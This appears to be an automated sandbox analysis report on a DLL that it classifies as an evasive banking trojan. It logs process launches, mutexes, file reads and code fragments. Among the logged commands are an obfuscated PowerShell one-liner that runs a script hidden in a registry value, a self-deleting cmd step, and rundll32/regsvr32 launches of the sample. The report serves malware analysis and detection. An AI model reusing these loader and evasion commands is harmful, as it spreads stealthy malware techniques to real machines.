            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP"
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61f113091fd0c.dll,DllRegisterServerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP"
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220126\PowerShell_transcript.124406.bcfkRUYJ.20220126102824.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npkgel2o.x34.ps1
            Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@76/57@0/2
            Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C12130 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_01C12130
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_01
            Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{749A14DC-4303-C6CF-6DE8-275AF19C4B2E}
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{24E56635-33EE-F65D-DD98-178A614C3B5E}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{D43C1FA8-2382-2681-4D48-07BAD1FC2B8E}
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{F4526350-C361-469C-ED68-A7DA711CCBAE}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{D0842125-EF91-8296-F904-93D63D78776A}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{E8190BB2-27B4-5AA3-F19C-4B2EB590AF42}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{F8CD5B50-F738-EA41-41AC-1BBE05A07FD2}
            Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{18963B60-9722-0ADF-E1CC-BBDEA5C01FF2}
            Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{54F96618-A314-A6F1-CDC8-873A517CAB0E}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_01
            Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{9C95EA6E-4BB4-2EFD-B590-AF42B9C45396}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_01
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: 61f113091fd0c.dllStatic file information: File size 1062256 > 1048576
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C17D50 push ecx; ret 1_2_01C17D59
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C180BF push ecx; ret 1_2_01C180CF
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC06F5 push dword ptr [ebp-00000284h]; ret 1_2_00DC0764
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0880 push dword ptr [ebp-00000284h]; ret 1_2_00DC08B6
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0AB8 push edx; ret 1_2_00DC0B11
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0A64 push edx; ret 1_2_00DC0B11
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0A64 push dword ptr [esp+10h]; ret 1_2_00DC0BFB
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC05DF push dword ptr [ebp-00000284h]; ret 1_2_00DC087F
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0BFC push dword ptr [esp+0Ch]; ret 1_2_00DC0C10
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0BFC push dword ptr [esp+10h]; ret 1_2_00DC0C56
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046E7347 push ecx; ret 1_2_046E7357
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F7D50 push ecx; ret 3_2_031F7D59
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F80BF push ecx; ret 3_2_031F80CF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE6DD0 push ecx; ret 3_2_04BE6DD9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE7347 push ecx; ret 3_2_04BE7357
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_011205DF push dword ptr [ebp-00000284h]; ret 4_2_0112087F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120880 push dword ptr [ebp-00000284h]; ret 4_2_011208B6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_011206F5 push dword ptr [ebp-00000284h]; ret 4_2_01120764
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120AB8 push edx; ret 4_2_01120B11
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120BFC push dword ptr [esp+0Ch]; ret 4_2_01120C10
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120BFC push dword ptr [esp+10h]; ret 4_2_01120C56
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120A64 push edx; ret 4_2_01120B11
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120A64 push dword ptr [esp+10h]; ret 4_2_01120BFB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EC7347 push ecx; ret 4_2_05EC7357
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_01057D50 push ecx; ret 5_2_01057D59
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_010580BF push ecx; ret 5_2_010580CF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB06F5 push dword ptr [ebp-00000284h]; ret 5_2_00EB0764
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0AB8 push edx; ret 5_2_00EB0B11
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0880 push dword ptr [ebp-00000284h]; ret 5_2_00EB08B6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0A64 push edx; ret 5_2_00EB0B11
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0A64 push dword ptr [esp+10h]; ret 5_2_00EB0BFB
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_046D653E
            Source: sjfy431f.dll.25.drStatic PE information: real checksum: 0x0 should be: 0x5cc9
            Source: 61f113091fd0c.dllStatic PE information: real checksum: 0x10f3d0 should be: 0x103870
            Source: tpt0a0ul.dll.34.drStatic PE information: real checksum: 0x0 should be: 0x3700
            Source: oyq1c2cj.dll.27.drStatic PE information: real checksum: 0x0 should be: 0xd902
            Source: pwlcj2cu.dll.46.drStatic PE information: real checksum: 0x0 should be: 0xd21c
            Source: pqvogmwc.dll.45.drStatic PE information: real checksum: 0x0 should be: 0x217c
            Source: oeprcmty.dll.41.drStatic PE information: real checksum: 0x0 should be: 0x740b
            Source: ugg3o5nf.dll.33.drStatic PE information: real checksum: 0x0 should be: 0x6d4b
            Source: 0hsihch1.dll.39.drStatic PE information: real checksum: 0x0 should be: 0x34a3
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
